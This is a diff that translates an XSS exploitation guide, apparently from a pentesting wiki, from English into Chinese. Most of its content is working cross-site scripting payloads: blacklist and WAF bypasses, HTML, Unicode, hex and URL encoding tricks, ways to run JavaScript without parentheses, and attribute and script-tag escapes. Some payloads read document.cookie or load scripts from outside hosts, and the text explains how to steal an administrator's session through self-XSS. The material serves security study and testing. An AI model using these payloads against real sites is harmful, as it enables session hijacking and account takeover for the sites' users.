 /?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
 ```
+### 黑名单绕过
 
-### Blacklist Bypasses
-
-If some kind of blacklist is being used you could try to bypass it with some silly tricks:
-
+如果正在使用某种黑名单，您可以尝试通过一些简单的技巧来绕过它：
 ```javascript
 //Random capitalization
 <script> --> <ScrIpT>
@@ -243,42 +232,36 @@ onerror=alert`1`
 //Use more than one
 <<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
 ```
+### 长度绕过（小型 XSS）
 
-### Length bypass (small XSSs)
-
-> [!NOTE] > **More tiny XSS for different environments** payload [**can be found here**](https://github.com/terjanq/Tiny-XSS-Payloads) and [**here**](https://tinyxss.terjanq.me).
-
+> [!NOTE] > **更多适用于不同环境的小型 XSS** payload [**可以在这里找到**](https://github.com/terjanq/Tiny-XSS-Payloads) 和 [**这里**](https://tinyxss.terjanq.me)。
 ```html
 <!-- Taken from the blog of Jorge Lajara -->
 <svg/onload=alert``> <script src=//aa.es> <script src=//℡㏛.pw>
 ```
-
-The last one is using 2 unicode characters which expands to 5: telsr\
-More of these characters can be found [here](https://www.unicode.org/charts/normalization/).\
-To check in which characters are decomposed check [here](https://www.compart.com/en/unicode/U+2121).
+最后一个使用了两个 Unicode 字符，扩展为五个：telsr\
+更多这些字符可以在 [这里](https://www.unicode.org/charts/normalization/) 找到。\
+要检查哪些字符被分解，请查看 [这里](https://www.compart.com/en/unicode/U+2121)。
 
 ### Click XSS - Clickjacking
 
-If in order to exploit the vulnerability you need the **user to click a link or a form** with prepopulated data you could try to [**abuse Clickjacking**](../clickjacking.md#xss-clickjacking) (if the page is vulnerable).
+如果为了利用这个漏洞，你需要 **用户点击一个链接或一个带有预填充数据的表单**，你可以尝试 [**滥用 Clickjacking**](../clickjacking.md#xss-clickjacking)（如果页面是脆弱的）。
 
-### Impossible - Dangling Markup
+### 不可能 - 悬挂标记
 
-If you just think that **it's impossible to create an HTML tag with an attribute to execute JS code**, you should check [**Danglig Markup** ](../dangling-markup-html-scriptless-injection/)because you could **exploit** the vulnerability **without** executing **JS** code.
+如果你认为 **创建一个带有属性以执行 JS 代码的 HTML 标签是不可能的**，你应该检查 [**悬挂标记**](../dangling-markup-html-scriptless-injection/)，因为你可以 **利用** 这个漏洞 **而不** 执行 **JS** 代码。
 
-## Injecting inside HTML tag
+## 在 HTML 标签内注入
 
-### Inside the tag/escaping from attribute value
-
-If you are in **inside a HTML tag**, the first thing you could try is to **escape** from the tag and use some of the techniques mentioned in the [previous section](./#injecting-inside-raw-html) to execute JS code.\
-If you **cannot escape from the tag**, you could create new attributes inside the tag to try to execute JS code, for example using some payload like (_note that in this example double quotes are use to escape from the attribute, you won't need them if your input is reflected directly inside the tag_):
+### 在标签内/从属性值中转义
 
+如果你在 **HTML 标签内**，你可以尝试的第一件事是 **从标签中转义**，并使用 [上一节](./#injecting-inside-raw-html) 中提到的一些技术来执行 JS 代码。\
+如果你 **无法从标签中转义**，你可以在标签内创建新的属性来尝试执行 JS 代码，例如使用一些有效载荷（_注意在这个例子中使用双引号来从属性中转义，如果你的输入直接反映在标签内，你就不需要它们_）：
 ```bash
 " autofocus onfocus=alert(document.domain) x="
 " onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
 ```
-
-**Style events**
-
+**样式事件**
 ```python
 <p style="animation: x;" onanimationstart="alert()">XSS</p>
 <p style="animation: x;" onanimationend="alert()">XSS</p>
@@ -288,18 +271,16 @@ If you **cannot escape from the tag**, you could create new attributes inside th
 #moving your mouse anywhere over the page (0-click-ish):
 <div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
 ```
+### 在属性内
 
-### Within the attribute
+即使你**无法逃离属性**（`"`被编码或删除），根据**你的值反映在哪个属性**中**如果你控制所有值或只是部分**，你仍然能够利用它。**例如**，如果你控制一个事件如`onclick=`，你将能够在点击时执行任意代码。\
+另一个有趣的**例子**是属性`href`，你可以使用`javascript:`协议来执行任意代码：**`href="javascript:alert(1)"`**
 
-Even if you **cannot escape from the attribute** (`"` is being encoded or deleted), depending on **which attribute** your value is being reflected in **if you control all the value or just a part** you will be able to abuse it. For **example**, if you control an event like `onclick=` you will be able to make it execute arbitrary code when it's clicked.\
-Another interesting **example** is the attribute `href`, where you can use the `javascript:` protocol to execute arbitrary code: **`href="javascript:alert(1)"`**
+**使用HTML编码/URL编码绕过事件**
 
-**Bypass inside event using HTML encoding/URL encode**
-
-The **HTML encoded characters** inside the value of HTML tags attributes are **decoded on runtime**. Therefore something like the following will be valid (the payload is in bold): `<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">Go Back </a>`
-
-Note that **any kind of HTML encode is valid**:
+HTML标签属性值中的**HTML编码字符**在运行时**被解码**。因此，像以下内容将是有效的（有效负载用粗体表示）：`<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">返回</a>`
 
+请注意**任何类型的HTML编码都是有效的**：
 ```javascript
 //HTML entities
 &apos;-alert(1)-&apos;
@@ -316,25 +297,19 @@ Note that **any kind of HTML encode is valid**:
 <a href="&#106;avascript:alert(2)">a</a>
 <a href="jav&#x61script:alert(3)">a</a>
 ```
-
-**Note that URL encode will also work:**
-
+**注意，URL 编码也会有效：**
 ```python
 <a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
 ```
-
-**Bypass inside event using Unicode encode**
-
+**通过使用Unicode编码绕过内部事件**
 ```javascript
 //For some reason you can use unicode to encode "alert" but not "(1)"
 <img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
 <img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
 ```
+### 特殊协议在属性中
 
-### Special Protocols Within the attribute
-
-There you can use the protocols **`javascript:`** or **`data:`** in some places to **execute arbitrary JS code**. Some will require user interaction on some won't.
-
+在某些地方，您可以使用协议 **`javascript:`** 或 **`data:`** 来 **执行任意 JS 代码**。有些需要用户交互，有些则不需要。
 ```javascript
 javascript:alert(1)
 JavaSCript:alert(1)
@@ -354,11 +329,9 @@ data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
 data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
 data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
 ```
+**可以注入这些协议的地方**
 
-**Places where you can inject these protocols**
-
-**In general** the `javascript:` protocol can be **used in any tag that accepts the attribute `href`** and in **most** of the tags that accepts the **attribute `src`** (but not `<img`)
-
+**一般来说** `javascript:` 协议可以 **在任何接受 `href` 属性的标签中使用**，并且在 **大多数** 接受 **`src` 属性的标签中使用**（但不包括 `<img>`）
 ```markup
 <a href="javascript:alert(1)">
 <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
@@ -378,29 +351,23 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc
 <embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
 <iframe srcdoc="<svg onload=alert(4);>">
 ```
+**其他混淆技巧**
 
-**Other obfuscation tricks**
-
-_**In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.**_
-
+_**在这种情况下，上一节中的HTML编码和Unicode编码技巧在属性内也是有效的。**_
 ```javascript
 <a href="javascript:var a='&apos;-alert(1)-&apos;'">
 ```
-
-Moreover, there is another **nice trick** for these cases: **Even if your input inside `javascript:...` is being URL encoded, it will be URL decoded before it's executed.** So, if you need to **escape** from the **string** using a **single quote** and you see that **it's being URL encoded**, remember that **it doesn't matter,** it will be **interpreted** as a **single quote** during the **execution** time.
-
+此外，还有另一个**好技巧**：**即使你在 `javascript:...` 中的输入被 URL 编码，它在执行之前会被 URL 解码。** 所以，如果你需要使用**单引号**从**字符串**中**逃逸**，并且你看到**它被 URL 编码**，请记住**这没关系，**它将在**执行**时被**解释**为**单引号**。
 ```javascript
 &apos;-alert(1)-&apos;
 %27-alert(1)-%27
 <iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
 ```
+注意，如果你尝试以任何顺序同时使用 `URLencode + HTMLencode` 来编码 **payload**，它 **将不会** **工作**，但你可以在 **payload** 中 **混合它们**。
 
-Note that if you try to **use both** `URLencode + HTMLencode` in any order to encode the **payload** it **won't** **work**, but you can **mix them inside the payload**.
-
-**Using Hex and Octal encode with `javascript:`**
-
-You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe` (at least) to declare **HTML tags to execute JS**:
+**使用 Hex 和 Octal 编码与 `javascript:`**
 
+你可以在 `iframe` 的 `src` 属性中（至少）使用 **Hex** 和 **Octal 编码** 来声明 **HTML 标签以执行 JS**：
 ```javascript
 //Encoded: <svg onload=alert(1)>
 // This WORKS
@@ -412,24 +379,20 @@ You can use **Hex** and **Octal encode** inside the `src` attribute of `iframe`
 <svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
 <svg onload=javascript:'\141\154\145\162\164\50\61\51' />
 ```
-
-### Reverse tab nabbing
-
+### 反向标签窃取
 ```javascript
 <a target="_blank" rel="opener"
 ```
-
-If you can inject any URL in an arbitrary **`<a href=`** tag that contains the **`target="_blank" and rel="opener"`** attributes, check the **following page to exploit this behavior**:
+如果您可以在任意 **`<a href=`** 标签中注入任何 URL，并且该标签包含 **`target="_blank" 和 rel="opener"`** 属性，请查看 **以下页面以利用此行为**：
 
 {{#ref}}
 ../reverse-tab-nabbing.md
 {{#endref}}
 
-### on Event Handlers Bypass
-
-First of all check this page ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) for useful **"on" event handlers**.\
-In case there is some blacklist preventing you from creating this even handlers you can try the following bypasses:
+### 事件处理程序绕过
 
+首先查看此页面 ([https://portswigger.net/web-security/cross-site-scripting/cheat-sheet](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)) 以获取有用的 **"on" 事件处理程序**。\
+如果有某些黑名单阻止您创建这些事件处理程序，您可以尝试以下绕过：
 ```javascript
 <svg onload%09=alert(1)> //No safari
 <svg %09onload=alert(1)>
@@ -444,109 +407,97 @@ Firefox: %09 %20 %28 %2C %3B
 Opera: %09 %20 %2C %3B
 Android: %09 %20 %28 %2C %3B
 ```
-
 ### XSS in "Unexploitable tags" (hidden input, link, canonical, meta)
 
-From [**here**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **it's now possible to abuse hidden inputs with:**
-
+从 [**这里**](https://portswigger.net/research/exploiting-xss-in-hidden-inputs-and-meta-tags) **现在可以利用隐藏输入：**
 ```html
 <button popvertarget="x">Click me</button>
 <input type="hidden" value="y" popover id="x" onbeforetoggle="alert(1)" />
 ```
-
-And in **meta tags**:
-
+在**meta标签**中：
 ```html
 <!-- Injection inside meta attribute-->
 <meta
-  name="apple-mobile-web-app-title"
-  content=""
-  Twitter
-  popover
-  id="newsletter"
-  onbeforetoggle="alert(2)" />
+name="apple-mobile-web-app-title"
+content=""
+Twitter
+popover
+id="newsletter"
+onbeforetoggle="alert(2)" />
 <!-- Existing target-->
 <button popovertarget="newsletter">Subscribe to newsletter</button>
 <div popover id="newsletter">Newsletter popup</div>
 ```
-
-From [**here**](https://portswigger.net/research/xss-in-hidden-input-fields): You can execute an **XSS payload inside a hidden attribute**, provided you can **persuade** the **victim** into pressing the **key combination**. On Firefox Windows/Linux the key combination is **ALT+SHIFT+X** and on OS X it is **CTRL+ALT+X**. You can specify a different key combination using a different key in the access key attribute. Here is the vector:
-
+从[**这里**](https://portswigger.net/research/xss-in-hidden-input-fields)：您可以在隐藏属性中执行**XSS有效负载**，前提是您可以**说服****受害者**按下**键组合**。在Firefox Windows/Linux上，键组合是**ALT+SHIFT+X**，在OS X上是**CTRL+ALT+X**。您可以使用访问键属性中的不同键指定不同的键组合。这里是向量：
 ```markup
 <input type="hidden" accesskey="X" onclick="alert(1)">
 ```
+**XSS有效载荷将类似于：`" accesskey="x" onclick="alert(1)" x="`**
 
-**The XSS payload will be something like this: `" accesskey="x" onclick="alert(1)" x="`**
+### 黑名单绕过
 
-### Blacklist Bypasses
+本节中已经揭示了几种使用不同编码的技巧。请**返回学习可以使用的地方：**
 
-Several tricks with using different encoding were exposed already inside this section. Go **back to learn where can you use:**
+- **HTML编码（HTML标签）**
+- **Unicode编码（可以是有效的JS代码）：** `\u0061lert(1)`
+- **URL编码**
+- **十六进制和八进制编码**
+- **数据编码**
 
-- **HTML encoding (HTML tags)**
-- **Unicode encoding (can be valid JS code):** `\u0061lert(1)`
-- **URL encoding**
-- **Hex and Octal encoding**
-- **data encoding**
+**HTML标签和属性的绕过**
 
-**Bypasses for HTML tags and attributes**
+阅读[上一节的黑名单绕过](./#blacklist-bypasses)。
 
-Read the[ Blacklist Bypasses of the previous section](./#blacklist-bypasses).
+**JavaScript代码的绕过**
 
-**Bypasses for JavaScript code**
+阅读[下一节的JavaScript绕过黑名单](./#javascript-bypass-blacklists-techniques)。
 
-Read the J[avaScript bypass blacklist of the following section](./#javascript-bypass-blacklists-techniques).
+### CSS小工具
 
-### CSS-Gadgets
+如果你在网络的**非常小的部分**发现了**XSS**，需要某种交互（也许是页脚中的一个小链接，带有onmouseover元素），你可以尝试**修改该元素占据的空间**以最大化触发链接的概率。
 
-If you found a **XSS in a very small part** of the web that requires some kind of interaction (maybe a small link in the footer with an onmouseover element), you can try to **modify the space that element occupies** to maximize the probabilities of have the link fired.
+例如，你可以在元素中添加一些样式，如：`position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
 
-For example, you could add some styling in the element like: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
-
-But, if the WAF is filtering the style attribute, you can use CSS Styling Gadgets, so if you find, for example
+但是，如果WAF正在过滤样式属性，你可以使用CSS样式小工具，所以如果你发现，例如
 
 > .test {display:block; color: blue; width: 100%\}
 
-and
+和
 
 > \#someid {top: 0; font-family: Tahoma;}
 
-Now you can modify our link and bring it to the form
+现在你可以修改我们的链接并将其变为
 
 > \<a href="" id=someid class=test onclick=alert() a="">
 
-This trick was taken from [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)
+这个技巧来自于[https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703)
 
-## Injecting inside JavaScript code
+## 在JavaScript代码中注入
 
-In these case you **input** is going to be **reflected inside the JS code** of a `.js` file or between `<script>...</script>` tags or between HTML events that can execute JS code or between attributes that accepts the `javascript:` protocol.
+在这些情况下，你的**输入**将**反映在.js文件的JS代码**中，或在`<script>...</script>`标签之间，或在可以执行JS代码的HTML事件之间，或在接受`javascript:`协议的属性之间。
 
-### Escaping \<script> tag
-
-If your code is inserted within `<script> [...] var input = 'reflected data' [...] </script>` you could easily **escape closing the `<script>`** tag:
+### 转义\<script>标签
 
+如果你的代码插入在`<script> [...] var input = 'reflected data' [...] </script>`中，你可以轻松地**转义关闭`<script>`**标签：
 ```javascript
 </script><img src=1 onerror=alert(document.domain)>
 ```
+注意，在这个例子中我们**甚至没有关闭单引号**。这是因为**HTML 解析首先由浏览器执行**，这涉及到识别页面元素，包括脚本块。解析 JavaScript 以理解和执行嵌入的脚本是在之后进行的。
 
-Note that in this example we **haven't even closed the single quote**. This is because **HTML parsing is performed first by the browser**, which involves identifying page elements, including blocks of script. The parsing of JavaScript to understand and execute the embedded scripts is only carried out afterward.
-
-### Inside JS code
-
-If `<>` are being sanitised you can still **escape the string** where your input is being **located** and **execute arbitrary JS**. It's important to **fix JS syntax**, because if there are any errors, the JS code won't be executed:
+### 在 JS 代码内部
 
+如果 `<>` 被清理，你仍然可以**转义字符串**，在你的输入**所在的位置**并**执行任意 JS**。修复 JS 语法是很重要的，因为如果有任何错误，JS 代码将不会被执行：
 ```
 '-alert(document.domain)-'
 ';alert(document.domain)//
 \';alert(document.domain)//
 ```
+### 模板字面量 \`\`
 
-### Template literals \`\`
-
-In order to construct **strings** apart from single and double quotes JS also accepts **backticks** **` `` `** . This is known as template literals as they allow to **embedded JS expressions** using `${ ... }` syntax.\
-Therefore, if you find that your input is being **reflected** inside a JS string that is using backticks, you can abuse the syntax `${ ... }` to execute **arbitrary JS code**:
-
-This can be **abused** using:
+为了构造 **字符串**，除了单引号和双引号，JS 还接受 **反引号** **` `` `**。这被称为模板字面量，因为它们允许使用 `${ ... }` 语法 **嵌入 JS 表达式**。\
+因此，如果你发现你的输入在使用反引号的 JS 字符串中被 **反射**，你可以利用语法 `${ ... }` 来执行 **任意 JS 代码**：
 
+这可以通过以下方式 **滥用**：
 ```javascript
 ;`${alert(1)}``${`${`${`${alert(1)}`}`}`}`
 ```
@@ -554,32 +505,26 @@ This can be **abused** using:
 ```````````````javascript
 // This is valid JS code, because each time the function returns itself it's recalled with ``
 function loop() {
-  return loop
+return loop
 }
 loop``````````````
 ```````````````
-
-### Encoded code execution
-
+### 编码代码执行
 ```markup
 <script>\u0061lert(1)</script>
 <svg><script>alert&lpar;'1'&rpar;
 <svg><script>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</script></svg>  <!-- The svg tags are neccesary
 <iframe srcdoc="<SCRIPT>&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</iframe>">
 ```
-
-### Unicode Encode JS execution
-
+### Unicode 编码 JS 执行
 ```javascript
 alert(1)
 alert(1)
 alert(1)
 ```
+### JavaScript 绕过黑名单技术
 
-### JavaScript bypass blacklists techniques
-
-**Strings**
-
+**字符串**
 ```javascript
 "thisisastring"
 'thisisastrig'
@@ -596,9 +541,7 @@ String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
 atob("dGhpc2lzYXN0cmluZw==")
 eval(8680439..toString(30))(983801..toString(36))
 ```
-
-**Special escapes**
-
+**特殊转义**
 ```javascript
 "\b" //backspace
 "\f" //form feed
@@ -612,16 +555,12 @@ eval(8680439..toString(30))(983801..toString(36))
 "\t" //tab
 // Any other char escaped is just itself
 ```
-
-**Space substitutions inside JS code**
-
+**JS代码中的空格替换**
 ```javascript
 <TAB>
 /**/
 ```
-
-**JavaScript comments (from** [**JavaScript Comments**](./#javascript-comments) **trick)**
-
+**JavaScript 注释（来自** [**JavaScript 注释**](./#javascript-comments) **技巧）**
 ```javascript
 //This is a 1 line comment
 /* This is a multiline comment*/
@@ -629,9 +568,7 @@ eval(8680439..toString(30))(983801..toString(36))
 #!This is a 1 line comment, but "#!" must to be at the beggining of the first line
 -->This is a 1 line comment, but "-->" must to be at the beggining of the first line
 ```
-
-**JavaScript new lines (from** [**JavaScript new line**](./#javascript-new-lines) **trick)**
-
+**JavaScript 新行（来自** [**JavaScript 新行**](./#javascript-new-lines) **技巧）**
 ```javascript
 //Javascript interpret as new line these chars:
 String.fromCharCode(10)
@@ -643,45 +580,39 @@ alert("//\u2028alert(1)") //0xe2 0x80 0xa8
 String.fromCharCode(8233)
 alert("//\u2029alert(1)") //0xe2 0x80 0xa9
 ```
-
-**JavaScript whitespaces**
-
+**JavaScript 空格**
 ```javascript
 log=[];
 function funct(){}
-  for(let i=0;i<=0x10ffff;i++){
-      try{
-        eval(`funct${String.fromCodePoint(i)}()`);
-        log.push(i);
-      }
-      catch(e){}
-  }
+for(let i=0;i<=0x10ffff;i++){
+try{
+eval(`funct${String.fromCodePoint(i)}()`);
+log.push(i);
+}
+catch(e){}
+}
 console.log(log)
 //9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279
 
 //Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
 <img/src/onerror=alert&#65279;(1)>
 ```
-
-**Javascript inside a comment**
-
+**在注释中的Javascript**
 ```javascript
 //If you can only inject inside a JS comment, you can still leak something
 //If the user opens DevTools request to the indicated sourceMappingURL will be send
 
 //# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
 ```
-
-**JavaScript without parentheses**
-
+**没有括号的JavaScript**
 ````javascript
 // By setting location
 window.location='javascript:alert\x281\x29'
 x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
-  // or any DOMXSS sink such as location=name
+// or any DOMXSS sink such as location=name
 
 // Backtips
-  // Backtips pass the string as an array of lenght 1
+// Backtips pass the string as an array of lenght 1
 alert`1`
 
 // Backtips + Tagged Templates + call/apply
@@ -692,35 +623,35 @@ eval.apply`${[`alert\x281\x29`]}`
 [].sort.call`${alert}1337`
 [].map.call`${eval}\\u{61}lert\x281337\x29`
 
-  // To pass several arguments you can use
+// To pass several arguments you can use
 function btt(){
-    console.log(arguments);
+console.log(arguments);
 }
 btt`${'arg1'}${'arg2'}${'arg3'}`
 
-  //It's possible to construct a function and call it
+//It's possible to construct a function and call it
 Function`x${'alert(1337)'}x```
 
-  // .replace can use regexes and call a function if something is found
+// .replace can use regexes and call a function if something is found
 "a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
 "a".replace.call`1${/./}${alert}`
-  // This happened in the previous example
-  // Change "this" value of call to "1,"
-  // match anything with regex /./
-  // call alert with "1"
+// This happened in the previous example
+// Change "this" value of call to "1,"
+// match anything with regex /./
+// call alert with "1"
 "a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
 
-  // Using Reflect.apply to call any function with any argumnets
+// Using Reflect.apply to call any function with any argumnets
 Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
 Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
-  // Using Reflect.set to call set any value to a variable
+// Using Reflect.set to call set any value to a variable
 Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
 
 
 
 // valueOf, toString
-  // These operations are called when the object is used as a primitive
-  // Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
+// These operations are called when the object is used as a primitive
+// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
 valueOf=alert;window+''
 toString=alert;window+''
 
@@ -732,28 +663,26 @@ onerror=eval;throw"=alert\x281\x29";
 {onerror=eval}throw"=alert(1)" //No ";"
 onerror=alert //No ";" using new line
 throw 1337
-  // Error handler + Special unicode separators
+// Error handler + Special unicode separators
 eval("onerror=\u2028alert\u2029throw 1337");
-  // Error handler + Comma separator
-  // The comma separator goes through the list and returns only the last element
+// Error handler + Comma separator
+// The comma separator goes through the list and returns only the last element
 var a = (1,2,3,4,5,6) // a = 6
 throw onerror=alert,1337 // this is throw 1337, after setting the onerror event to alert
 throw onerror=alert,1,1,1,1,1,1337
-  // optional exception variables inside a catch clause.
+// optional exception variables inside a catch clause.
 try{throw onerror=alert}catch{throw 1}
 
 
 // Has instance symbol
 'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}
 'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}
-  // The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
+// The “has instance” symbol allows you to customise the behaviour of the instanceof operator, if you set this symbol it will pass the left operand to the function defined by the symbol.
 ````
-
 - [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
 - [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
 
-**Arbitrary function (alert) call**
-
+**任意函数（alert）调用**
 ````javascript
 //Eval like functions
 eval('ale'+'rt(1)')
@@ -813,72 +742,64 @@ top['al\x65rt'](1)
 top[8680439..toString(30)](1)
 <svg><animate onbegin=alert() attributeName=x></svg>
 ````
+## **DOM 漏洞**
 
-## **DOM vulnerabilities**
-
-There is **JS code** that is using **unsafely data controlled by an attacker** like `location.href` . An attacker, could abuse this to execute arbitrary JS code.\
-**Due to the extension of the explanation of** [**DOM vulnerabilities it was moved to this page**](dom-xss.md)**:**
+有 **JS 代码** 使用了 **由攻击者控制的不安全数据**，如 `location.href`。攻击者可以利用这一点执行任意的 JS 代码。\
+**由于对** [**DOM 漏洞的解释扩展到此页面**](dom-xss.md)**:**
 
 {{#ref}}
 dom-xss.md
 {{#endref}}
 
-There you will find a detailed **explanation of what DOM vulnerabilities are, how are they provoked, and how to exploit them**.\
-Also, don't forget that **at the end of the mentioned post** you can find an explanation about [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering).
+在这里你会找到关于 **DOM 漏洞是什么、如何引发以及如何利用它们的详细解释**。\
+此外，不要忘记在 **提到的帖子末尾** 你可以找到关于 [**DOM Clobbering 攻击**](dom-xss.md#dom-clobbering) 的解释。
 
-### Upgrading Self-XSS
+### 升级 Self-XSS
 
 ### Cookie XSS
 
-If you can trigger a XSS by sending the payload inside a cookie, this is usually a self-XSS. However, if you find a **vulnerable subdomain to XSS**, you could abuse this XSS to inject a cookie in the whole domain managing to trigger the cookie XSS in the main domain or other subdomains (the ones vulnerable to cookie XSS). For this you can use the cookie tossing attack:
+如果你可以通过在 cookie 中发送有效负载来触发 XSS，这通常是一个 self-XSS。然而，如果你发现一个 **易受 XSS 攻击的子域名**，你可以利用这个 XSS 在整个域中注入一个 cookie，从而在主域或其他子域（易受 cookie XSS 攻击的那些）中触发 cookie XSS。为此你可以使用 cookie tossing 攻击：
 
 {{#ref}}
 ../hacking-with-cookies/cookie-tossing.md
 {{#endref}}
 
-You can find a great abuse of this technique in [**this blog post**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html).
+你可以在 [**这篇博客文章**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html) 中找到对这一技术的极佳利用。
 
-### Sending your session to the admin
+### 将你的会话发送给管理员
 
-Maybe an user can share his profile with the admin and if the self XSS is inside the profile of the user and the admin access it, he will trigger the vulnerability.
+也许用户可以与管理员共享他的个人资料，如果 self XSS 在用户的个人资料中，而管理员访问了它，他将触发该漏洞。
 
-### Session Mirroring
+### 会话镜像
 
-If you find some self XSS and the web page have a **session mirroring for administrators**, for example allowing clients to ask for help an in order for the admin to help you he will be seeing what you are seeing in your session but from his session.
+如果你发现一些 self XSS，并且网页有 **管理员的会话镜像**，例如允许客户请求帮助，为了帮助你，管理员将看到你在你的会话中看到的内容，但从他的会话中。
 
-You could make the **administrator trigger your self XSS** and steal his cookies/session.
+你可以让 **管理员触发你的 self XSS** 并窃取他的 cookies/会话。
 
-## Other Bypasses
+## 其他绕过
 
-### Normalised Unicode
+### 规范化 Unicode
 
-You could check is the **reflected values** are being **unicode normalized** in the server (or in the client side) and abuse this functionality to bypass protections. [**Find an example here**](../unicode-injection/#xss-cross-site-scripting).
-
-### PHP FILTER_VALIDATE_EMAIL flag Bypass
+你可以检查 **反射值** 是否在服务器（或客户端）中 **进行 Unicode 规范化**，并利用此功能绕过保护。 [**在这里找到一个例子**](../unicode-injection/#xss-cross-site-scripting)。
 
+### PHP FILTER_VALIDATE_EMAIL 标志绕过
 ```javascript
 "><svg/onload=confirm(1)>"@x.y
 ```
+### Ruby-On-Rails 绕过
 
-### Ruby-On-Rails bypass
-
-Due to **RoR mass assignment** quotes are inserted in the HTML and then the quote restriction is bypassed and additoinal fields (onfocus) can be added inside the tag.\
-Form example ([from this report](https://hackerone.com/reports/709336)), if you send the payload:
-
+由于 **RoR 大量赋值**，引号被插入到 HTML 中，然后绕过引号限制，并且可以在标签内添加额外字段 (onfocus)。\
+表单示例 ([来自此报告](https://hackerone.com/reports/709336))，如果您发送有效负载：
 ```
 contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
 ```
-
-The pair "Key","Value" will be echoed back like this:
-
+成对的 "Key","Value" 将被回显如下：
 ```
 {" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}
 ```
+然后，将插入 onfocus 属性，并发生 XSS。
 
-Then, the onfocus attribute will be inserted and XSS occurs.
-
-### Special combinations
-
+### 特殊组合
 ```markup
 <iframe/src="data:text/html,<svg onload=alert(1)>">
 <input type=image src onerror="prompt(1)">
@@ -908,129 +829,115 @@ Then, the onfocus attribute will be inserted and XSS occurs.
 window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
 document['default'+'View'][`\u0061lert`](3)
 ```
+### XSS与302响应中的头注入
 
-### XSS with header injection in a 302 response
